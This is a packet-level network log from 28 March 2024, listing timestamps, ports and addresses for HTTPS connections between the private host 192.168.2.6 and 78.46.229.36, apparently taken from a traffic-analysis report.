Mar 28, 2024 20:34:59.904341936 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.904346943 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.904369116 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.904387951 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.905781031 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.905801058 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.905857086 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.905864000 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.905922890 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.907974005 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.907989025 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.908051014 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.908056974 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.908097982 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.909862041 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.909882069 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.909933090 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.909938097 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.909974098 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.912094116 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.912112951 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.912175894 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.912179947 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.912239075 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.914458990 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.914478064 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.914537907 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.914542913 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.914645910 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.916317940 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.916332960 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.916388988 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.916395903 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.916439056 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.918557882 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.918598890 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.918658972 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.918664932 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.918701887 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.920409918 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.920423985 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.920495033 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.920500040 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.920546055 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.922590971 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.922602892 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.922655106 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.922660112 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.922719955 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.924491882 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.924510956 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.924592972 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.924601078 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.924648046 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.926134109 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.926148891 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.926208019 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.926213026 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.926268101 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.927596092 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.927609921 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.927684069 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.927689075 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.927746058 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.930041075 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.930062056 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.930123091 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.930128098 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.930176020 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.931968927 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.931988955 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.932044983 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.932050943 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.932097912 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.933722019 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.933736086 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.933840990 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.933845997 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.933891058 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.936177969 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.936194897 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.936271906 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.936278105 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.936321974 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.937346935 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.937367916 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.937424898 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.937433004 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.937474012 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.940244913 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.940265894 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.940329075 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.940334082 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.940385103 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.942297935 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.942312956 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.942375898 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.942382097 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.942434072 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.943609953 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.943624973 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.943686008 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.943691015 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.943778038 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.943815947 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.943824053 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.943849087 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.943871021 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.943907022 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.944149017 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.944161892 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:00.009110928 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:00.009144068 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:00.009260893 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:00.009509087 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:00.009524107 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:00.389744043 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:00.389838934 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:00.390235901 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:00.390245914 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:00.392143965 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:00.392149925 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:00.392194986 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:00.392203093 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.102767944 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.102811098 CET	443	49716	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.102873087 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.103089094 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.103102922 CET	443	49716	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.222121000 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.222172022 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.222198963 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.222214937 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.222239971 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.222259998 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.223098993 CET	49715	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.223115921 CET	443	49715	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.483695030 CET	443	49716	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.483755112 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.484168053 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.484175920 CET	443	49716	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:01.485877991 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:01.485883951 CET	443	49716	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:02.197419882 CET	49717	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.197472095 CET	443	49717	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:02.197539091 CET	49717	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.197747946 CET	49717	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.197765112 CET	443	49717	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:02.318805933 CET	443	49716	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:02.318866014 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.318876028 CET	443	49716	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:02.318916082 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.319731951 CET	49716	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.319747925 CET	443	49716	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:02.577884912 CET	443	49717	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:02.577996969 CET	49717	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.578519106 CET	49717	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.578532934 CET	443	49717	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:02.580154896 CET	49717	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:02.580164909 CET	443	49717	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:03.331403017 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:03.331442118 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:03.331547022 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:03.331901073 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:03.331913948 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:03.394635916 CET	443	49717	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:03.394712925 CET	443	49717	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:03.395091057 CET	49717	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:03.416537046 CET	49717	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:03.416562080 CET	443	49717	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:03.711859941 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:03.711932898 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:03.836576939 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:03.836591959 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:03.839577913 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:03.839586020 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.320684910 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.320705891 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.320720911 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.320770025 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.320823908 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.320831060 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.320887089 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.406339884 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.406357050 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.406465054 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.406477928 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.406517029 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.527786016 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.527806044 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.527908087 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.527925014 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.527981043 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.613746881 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.613768101 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.613912106 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.613931894 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.613974094 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.679073095 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.679090977 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.679234028 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.679253101 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.679322958 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.724885941 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.724903107 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.725053072 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.725068092 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.725161076 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.761898994 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.761919022 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.762015104 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.762031078 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.762072086 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.800332069 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.800348997 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.800437927 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.800450087 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.800482035 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.830293894 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.830313921 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.830415010 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.830430031 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.830463886 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.865816116 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.865833998 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.865900040 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.865911961 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.865938902 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.865964890 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.897203922 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.897222996 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.897278070 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.897289991 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.897345066 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.897345066 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.919364929 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.919382095 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.919487953 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.919500113 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.919542074 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.941306114 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.941322088 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.941505909 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.941526890 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.941566944 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.962949038 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.962970018 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.963089943 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.963104963 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.963141918 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.981270075 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.981288910 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.981403112 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.981414080 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.981448889 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.997206926 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.997225046 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.997312069 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:04.997323036 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:04.997360945 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.015480042 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.015501022 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.015577078 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.015588045 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.015633106 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.029041052 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.029061079 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.029139042 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.029149055 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.029160976 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.029206991 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.044001102 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.044018030 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.044148922 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.044161081 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.044214964 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.056967020 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.056986094 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.057060003 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.057070971 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.057081938 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.057100058 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.069459915 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.069485903 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.069535971 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.069546938 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.069577932 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.069591045 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.083142996 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.083167076 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.083251953 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.083262920 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.083281040 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.083304882 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.095369101 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.095386028 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.095443010 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.095453024 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.095479965 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.095499039 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.106333971 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.106352091 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.106440067 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.106451035 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.106545925 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.118864059 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.118880987 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.118927002 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.118937016 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.118977070 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.118999958 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.128930092 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.128947020 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.129045963 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.129057884 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.129095078 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.139430046 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.139452934 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.139532089 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.139544010 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.139552116 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.139580011 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.149203062 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.149219990 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.149291992 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.149302959 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.149359941 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.159782887 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.159801006 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.159869909 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.159879923 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.159912109 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.169517040 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.169533014 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.169631958 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.169642925 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.169677973 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.178479910 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.178495884 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.178602934 CET	49718	443	192.168.2.6	78.46.229.36
